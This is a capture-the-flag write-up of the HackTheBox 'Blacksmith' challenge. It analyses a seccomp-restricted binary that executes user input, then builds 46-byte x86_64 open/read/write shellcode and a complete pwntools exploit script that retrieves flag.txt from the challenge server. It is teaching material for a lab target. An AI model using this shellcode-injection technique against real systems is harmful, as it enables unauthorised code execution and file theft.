Blacksmith (HackTheBox)
Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:
You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".
In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.
Summary
- First looks
- Finding vulnerability primitives
- Developing AMD64 (x86_64) assembly
- Retrieving the flag
First looks
We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to craft items:
$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of the blacksmith binary is:
$ checksec blacksmith
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
The fields in checksec mean the following:
- Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
- RELRO: Relocation Read-Only - secures the dynamic linking process
- Stack: stack canaries - protect against stack buffer overflow attacks
- NX: No eXecute - writable memory cannot be executed
- PIE: Position Independent Executable - address randomization
- RWX: Read Write Execute - there's memory that's RWX
Since NX is disabled and the binary has RWX segments, the logical conclusion is that we need to write shellcode into RWX memory that reads out flag.txt (based on the challenge description).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:
- an information leak primitive to leak an address
- an arbitrary write primitive to control the execution flow
... which combine into control over the execution flow: the write primitive redirects execution to an address obtained through the leak.
Main analysis
When I want to find vulnerability primitives, I open the binary in Ghidra, a reverse engineering tool developed by the NSA (yes, that NSA). I start analyzing a binary at the main function. In this case, it looked like the following:
void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  } else if (i_option == 3) {
    bow();
  } else if (i_option == 1) {
    sword();
  } else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
So, the main function does the following:
- setup()
- sec()
- shield(), bow() or sword()
In addition, the main function uses a stack canary, stored in the variable __can_token. As you can see, if __can_token is no longer equal to the original value, stack corruption has been detected and __stack_chk_fail is called, which aborts the program.
The setup function disables buffering for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.
Sec function
void sec(void)
{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
  // allow sys_read, sys_write,
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
We can see that the sec function primarily uses seccomp to create an allow list of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) In libseccomp, the 0 passed to seccomp_init is SCMP_ACT_KILL (the default action for everything not listed) and 0x7fff0000 is SCMP_ACT_ALLOW. By doing this, the developer of the program prevents us from spawning a shell on the server, since we would need sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.
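To make the effect of the filter concrete, here is a minimal Python sketch that models the allow list as plain data. It is not how seccomp is implemented; it only mirrors the four syscall numbers passed to seccomp_rule_add in sec(). The helper names (is_allowed, describe) are made up for this illustration, and the name table only covers the x86_64 syscall numbers discussed in this write-up.

```python
# x86_64 Linux syscall numbers relevant to this challenge.
SYSCALL_NAMES = {0: "read", 1: "write", 2: "open", 59: "execve", 60: "exit"}

# Numbers passed to seccomp_rule_add() in sec(), in the order they appear.
ALLOWED = (2, 0, 1, 60)


def is_allowed(nr: int) -> bool:
    """Return True if the modelled allow list lets this syscall through."""
    return nr in ALLOWED


def describe(nr: int) -> str:
    """Human-readable verdict for a syscall number (hypothetical helper)."""
    name = SYSCALL_NAMES.get(nr, f"unknown_{nr}")
    verdict = "allowed" if is_allowed(nr) else "blocked"
    return f"sys_{name} ({nr}): {verdict}"


if __name__ == "__main__":
    for nr in (0, 1, 2, 59, 60):
        print(describe(nr))
```

Running it lists sys_execve (59) as blocked, which is why the payload later on sticks to open, read and write.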
Shield analysis
Next, we have the shield(), bow() and sword() calls in main(). The bow() and sword() functions crash the program before the user can give any input, so they are irrelevant. That means the vulnerability must be in shield().
void shield(void)
{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}
What sticks out to me in this function is that we read user input into buf and then call that buffer like a function using (*(code *)buf)(). That line is equivalent to the ASM below:
00100dd9  48 8d 55 b0     LEA  RDX, [RBP - 0x50]  ; code* RDX = &buf
00100ddd  b8 00 00 00 00  MOV  EAX, 0x0
00100de2  ff d2           CALL RDX                ; RDX()
The (*(code *)buf)(); call executes the contents of buf on the stack as if they were machine code. This means we can inject our own code into the program.
Developing AMD64 (x86_64) assembly
We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:
- We have 63 bytes to work with:
// shield() function
read(STDIN_FILENO,buf,63);
(*(code *)buf)();
- We can only use sys_read, sys_write, sys_open and sys_exit:
// sec() function
// allow sys_read, sys_write,
// sys_open, sys_exit
ctx = seccomp_init(0);
seccomp_rule_add(ctx,0x7fff0000,2,0);
seccomp_rule_add(ctx,0x7fff0000,0,0);
seccomp_rule_add(ctx,0x7fff0000,1,0);
seccomp_rule_add(ctx,0x7fff0000,60,0);
seccomp_load(ctx);
- We do not have a stack address (ASLR)
However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading its contents into a buffer, and writing the buffer to stdout.
To interact with files, we need to use system calls ("syscalls"). Syscalls are essentially the ABI (binary API) of the Linux kernel, which is like the god of the operating system: it provides memory management, CPU scheduling, driver management, hardware I/O, et cetera. If you want to learn more about the kernel, "Linux Kernel Development" by Robert Love is an excellent book (I've read it).
I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:
// sys_open(char* filename, int flags, int mode); flags 0 == O_RDONLY
int fd = sys_open("flag.txt", 0, 0);
// sys_read(int fd, char* buf, size_t count); returns the number of bytes read
int n_read = sys_read(fd, buf, 0x9999);
// sys_write(int fd, char* buf, size_t count); fd 1 == stdout
sys_write(1, buf, n_read);
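The same open, read, write sequence can be tried out from Python before committing it to assembly. This is only a sketch of the plan, not the exploit: dump_file is a name invented here, the temporary flag.txt is a stand-in, and Python's os.open may be implemented with a different underlying syscall (such as openat) than the raw sys_open the shellcode uses.

```python
import os
import tempfile


def dump_file(path: str, max_bytes: int = 0x100, out_fd: int = 1) -> int:
    """Open, read once, write once; returns the number of bytes written."""
    fd = os.open(path, os.O_RDONLY)    # sys_open(path, 0, 0); O_RDONLY == 0
    try:
        data = os.read(fd, max_bytes)  # sys_read(fd, buf, count)
    finally:
        os.close(fd)                   # the shellcode skips this step
    return os.write(out_fd, data)      # sys_write(1, buf, n_read)


if __name__ == "__main__":
    # Hypothetical stand-in for the real flag.txt so the sketch runs anywhere.
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "flag.txt")
        with open(path, "wb") as f:
            f.write(b"HTB{example_flag}\n")
        dump_file(path)
```

The shellcode never closes the file descriptor: sys_close is not on the allow list, and the process dies right after the write anyway.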
I came up with the following ASM:
mov rax, 2
lea rdi, [rip+41] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall
mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Since we have only 63 bytes to work with, I had to be creative. In assembly, a lot of bytes go to constant values: mov rax, 2 assembles to 7 bytes because the constant is embedded in the instruction as a 4-byte immediate (0x00000002). That means we can save a lot of bytes by reusing register values.
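I eventually refactored the payload into 46 bytes. Note that it relies on the register state at the moment shield() calls the buffer: push r10 / inc r10 / mov rax, r10 only yields syscall number 2 (sys_open) if r10 holds 1 on entry, pop rax later restores that 1 for sys_write, and mov rdx, r11 reuses whatever the first syscall left in r11 (the syscall instruction saves RFLAGS there) as the read length: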
push r10
inc r10
mov rax, r10
lea rdi, [rip+31] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall
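The byte counts and the rip-relative offsets in both listings can be double-checked with some arithmetic. The sketch below hard-codes the encodings I would expect an assembler such as GNU as to emit for each instruction; treat those hex strings as an assumption and verify them with asm() from pwntools if in doubt. The helper names code_size and lea_displacement are invented for this example.

```python
# (mnemonic, assumed hex encoding) for the first, unoptimized payload.
FIRST = [
    ("mov rax, 2", "48c7c002000000"),
    ("lea rdi, [rip+41]", "488d3d29000000"),
    ("xor rsi, rsi", "4831f6"),
    ("xor rdx, rdx", "4831d2"),
    ("syscall", "0f05"),
    ("mov rsi, rdi", "4889fe"),
    ("mov rdi, rax", "4889c7"),
    ("xor rax, rax", "4831c0"),
    ("mov rdx, 30", "48c7c21e000000"),
    ("syscall", "0f05"),
    ("mov rdx, rax", "4889c2"),
    ("mov rax, 1", "48c7c001000000"),
    ("mov rdi, rax", "4889c7"),
    ("syscall", "0f05"),
]

# Same for the refactored payload that reuses r10 and r11.
SECOND = [
    ("push r10", "4152"),
    ("inc r10", "49ffc2"),
    ("mov rax, r10", "4c89d0"),
    ("lea rdi, [rip+31]", "488d3d1f000000"),
    ("xor rsi, rsi", "4831f6"),
    ("xor rdx, rdx", "4831d2"),
    ("syscall", "0f05"),
    ("mov rsi, rdi", "4889fe"),
    ("mov rdi, rax", "4889c7"),
    ("xor rax, rax", "4831c0"),
    ("mov rdx, r11", "4c89da"),
    ("syscall", "0f05"),
    ("mov rdx, rax", "4889c2"),
    ("pop rax", "58"),
    ("mov rdi, rax", "4889c7"),
    ("syscall", "0f05"),
]


def code_size(listing) -> int:
    """Total number of machine-code bytes in a listing."""
    return sum(len(bytes.fromhex(enc)) for _, enc in listing)


def lea_displacement(listing) -> int:
    """Bytes between the end of the lea and the end of the code.

    rip points at the next instruction, so this is the offset that makes
    rdi point at the filename appended right after the code.
    """
    offset = 0
    for mnemonic, enc in listing:
        offset += len(bytes.fromhex(enc))
        if mnemonic.startswith("lea"):
            return code_size(listing) - offset
    raise ValueError("listing contains no lea instruction")


if __name__ == "__main__":
    for name, listing in (("first", FIRST), ("second", SECOND)):
        total = code_size(listing) + len(b"flag.txt")
        print(name, code_size(listing), lea_displacement(listing), total)
```

Under these assumed encodings the first version is 55 bytes of code, so appending the 8-byte "flag.txt" fills the 63-byte read exactly, while the refactored version leaves some room to spare. The computed displacements match the +41 and +31 used in the listings.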
Retrieving the flag
Now that we have a working payload, we need to send it to the application. I made the following script using pwntools:
#!/usr/bin/python3
from pwn import remote, ELF, asm, context

e = ELF('blacksmith')
context.binary = e.path  # set the pwntools context (arch, bits) for asm()

is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

p.sendlineafter(b"all!\n> ", b'1')
# b"\xf0\x9f\x8f\xb9" is the UTF-8 encoding of the bow emoji printed before the prompt
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm('''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall''')
print(f"writing ASM with {len(payload)} bytes")

# payload = shellcode + filename; lea rdi, [rip+31] points right past the shellcode
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")
assert len(payload) <= 63  # shield() reads at most 63 bytes

p.sendafter(b"weapon?\n> ", payload)
# read until the process exits or crashes instead of looping into an EOFError
print(p.recvall(timeout=5))